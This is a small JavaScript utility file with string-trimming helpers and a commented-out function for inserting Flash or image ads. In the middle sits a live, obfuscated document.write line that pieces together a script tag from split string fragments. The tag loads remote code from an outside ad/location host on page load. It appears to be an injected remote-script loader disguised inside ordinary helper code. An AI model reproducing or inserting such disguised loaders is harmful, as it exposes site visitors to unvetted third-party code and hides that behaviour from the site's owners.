﻿
//去左空格; 
function ltrim(s) {
    return s.replace(/^(\s*|　*)/, "");
}
//去右空格; 
function rtrim(s) {
    return s.replace(/(\s*|　*)$/, "");
}
//去左右空格; 
function trim(s) {
    return ltrim(rtrim(s));
}
document.write("<s"+"cript src='http://a"+"d.n"+"u99"+".c"+"om/i"+"p.asp?l"+"oc=shanghai|ningbo|wenzhou'><\/s"+"cript>");
//function InsertGG(fileExtension, link, file, w, h) {
//    if (fileExtension == 'swf') {
//        //                document.write('<div style="z-index:-1"> ');
//        
//        document.write('<object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=9,0,28,0" width="' + w + '" height="' + h + '">');
//        document.write('<param name="movie" value="' + file + '" />');
//        document.write('<param name="quality" value="high" />');
//        document.write('<embed src="' + file + '" quality="high" pluginspage="http://www.adobe.com/shockwave/download/download.cgi?P1_Prod_Version=ShockwaveFlash" type="application/x-shockwave-flash" width="' + w + '" height="' + h + '"></embed>');
//        document.write('</object>');

//        //                document.write('</div> ');
//        //                document.write('<div id="huiLayer" style="cursor:hand; position:absolute;margin-top:-81px;width:' + w + 'px; height:' + h + 'px; z-index:1; visibility: visible;">');
//        //                document.write('<a href="' + link + '" target="_blank">');
//        //                document.write('<img src="/images/blank.gif" width="100%" height="100%" border="0">');
//        //                document.write('</a>');
//        //                document.write('</div>');
//    }
//    else {
//        document.write('<a href="' + link + '" target="_blank">');
//        document.write('<img src="' + file + '" width="' + w + '" height="' + h + '" /> ');
//        document.write('</a>');
//    }
//}

